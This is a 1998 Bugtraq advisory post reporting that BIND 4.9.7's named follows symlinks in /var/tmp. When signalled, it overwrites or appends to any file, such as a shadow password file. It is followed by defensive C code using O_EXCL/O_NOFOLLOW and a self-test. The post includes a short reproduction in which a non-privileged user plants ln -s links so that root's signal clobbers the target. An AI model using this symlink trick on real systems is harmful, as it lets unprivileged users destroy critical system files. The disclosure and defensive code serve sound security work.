BIND 4.9.7 named follows symlinks, clobbers anything.

From: Joe (joeat_private)
Date: Fri Apr 10 1998 - 13:29:20 PDT


    [ Posted to BUGTRAQ and comp.protocols.dns.bind ]
    [ Standard apologies if this is already known - a search on the Bugtraq
      archive and Deja News comp.protocols.dns.bind doesn't indicate it.]
    
    The new named(8) happily follows symlinks and clobbers any file on the
    system when it receives a SIGINT (used for debugging and statistics
    gathering). SIGINT dumps the named database to /var/tmp/named_dump.db.
    
    It will also happily append data to any system file when it receives a
    SIGIOT. SIGIOT appends named statistics to /var/tmp/named.stats.
    
    This problem is probably recursive to previous versions of named but since
    I've already replaced mine I can't confirm that.
    
    On Wed, 8 Apr 1998, Aleph One wrote:
    
    [Snippage of the latest CERT]
    
    >      (Note: the in.named(8) man page mentions that sending a SIGINT to the
    >      in.named process will dump the current data base and cache to, by
    >      default, /var/tmp/named_dump.db. Some sites may find this useful in
    >      looking for self-referential CNAMEs.  Please see the in.named(8) man
    >      page for further details.)
    
    
    This caught my eye in that CERT advisory and, after updating my BIND to the
    new 4.9.7 (RedHat 4.2 Linux 2.0.30 i586) and reading through the
    named(8) man pages, I ran a quick check.
    
    [root]# cp /etc/shadow /etc/junk.shadow
    [root]# ls -l /etc/junk.shadow
    -r--------   1 root     root          992 Apr 10 12:52 junk.shadow
    
    Now as a non-priv user..
    
    [Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
    [Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
    [Luser]# logout
    
    (Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is toast...)
    
    [root]# kill -SIGIOT [named.pid]
    
    [root]# ls -al /etc/junk.shadow
    -r--------   1 root     root         2251 Apr 10 13:00 /etc/junk.shadow
    
    [root]# less /etc/junk.shadow
    
            someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
            nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
            +++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
            2368    time since boot (secs)
            2368    time since reset (secs)
            0       Unknown query types
    <SNIP>
    
    The statistics dump gets appended to any file on the system.
    
    Now for the real horror -
    
    [root]# kill -SIGINT [named.pid]
    [root]# ls -l /etc/junk.shadow
    -r--------   1 root     root         5249 Apr 10 13:02 /etc/junk.shadow
    [root]# less /etc/junk.shadow
    
            ; Dumped at Fri Apr 10 13:02:40 1998
            ;; ++zone table++
            <SNIP>
    
    No trace of the original remains. Your shadow password file or anything
    else on the system is fried.
    
    Enjoy.
    
    
    --
    Joe H.                                  Technical Support
    General Support:  supportat_private     Blarg! Online Services, Inc.
    Voice:  425/401-9821 or 888/66-BLARG    http://www.blarg.net
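The failure Joe describes is a daemon that opens a fixed, predictable name in a world-writable directory with plain truncate or append semantics, so any symlink planted there redirects the write. The following is an added defender's example, not code from the post or from BIND: two small openers, one for a truncating dump and one for an appending stats file, that refuse to go through a planted link, together with a self-contained check on constructed files under a private temp directory. The function names (`safe_create_dump`, `safe_open_append`, `demo_symlink_refused`), the temp paths and the sample file content are all assumptions made for the example; it targets Linux/POSIX systems that provide `O_NOFOLLOW`.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Truncating dump (the SIGINT case): create a brand-new file. With
 * O_CREAT|O_EXCL, open() fails with EEXIST if the name already exists,
 * even when it is a symlink, regardless of where the link points. The
 * caller removes any stale dump beforehand; unlink() removes a link, not
 * its target, and the O_EXCL create is never redirected. Hypothetical helper. */
int safe_create_dump(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Appending stats (the SIGIOT case): O_NOFOLLOW makes open() fail with
 * ELOOP when the final component is a symlink. fstat() on the descriptor
 * we already hold (so no time-of-check/time-of-use window) then rejects
 * non-regular files, hard links and files we do not own. Hypothetical helper. */
int safe_open_append(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario mirroring the post: a protected "junk.shadow", a
 * symlink named named_dump.db pointing at it, and an unplanted name.
 * Returns 1 if both openers refuse the link, the target is byte-for-byte
 * unchanged and the unplanted name is created normally; 0 otherwise. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/named_dump_demo.XXXXXX";   /* constructed temp dir */
    char target[256], link[256], fresh[256];
    const char secret[] = "someusr:[constructed hash]:10311:-1:-1:-1:-1:-1:-1\n";
    char buf[sizeof secret];
    int ok = 1, fd;
    ssize_t n;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/junk.shadow", dir);
    snprintf(link, sizeof link, "%s/named_dump.db", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh_dump.db", dir);

    /* The file an attacker would like overwritten. */
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, secret, sizeof secret - 1) != (ssize_t)(sizeof secret - 1))
        ok = 0;
    if (fd >= 0)
        close(fd);
    /* The planted link, as in the post's ln -s step. */
    if (symlink(target, link) != 0)
        ok = 0;

    /* Both the dump and the stats path must refuse to go through the link. */
    if (safe_create_dump(link) != -1 || errno != EEXIST)
        ok = 0;
    if (safe_open_append(link) != -1 || errno != ELOOP)
        ok = 0;

    /* The target must still hold exactly what we wrote. */
    fd = open(target, O_RDONLY);
    n = (fd < 0) ? -1 : read(fd, buf, sizeof buf);
    if (fd >= 0)
        close(fd);
    if (n != (ssize_t)(sizeof secret - 1) || memcmp(buf, secret, (size_t)n) != 0)
        ok = 0;

    /* A name nobody has planted is created as a fresh, private file. */
    fd = safe_create_dump(fresh);
    if (fd < 0)
        ok = 0;
    else
        close(fd);

    unlink(fresh);
    unlink(link);
    unlink(target);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("symlink refused and target intact: %s\n",
           demo_symlink_refused() ? "yes" : "NO");
    return 0;
}
```

The open-flag discipline is only half of the fix; the other half is not writing privileged output into `/var/tmp` at all. A dump directory owned by the daemon's user and not writable by anyone else removes the attacker's ability to plant the name in the first place, and the `O_EXCL`/`O_NOFOLLOW` checks then act as defence in depth rather than the only barrier.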
    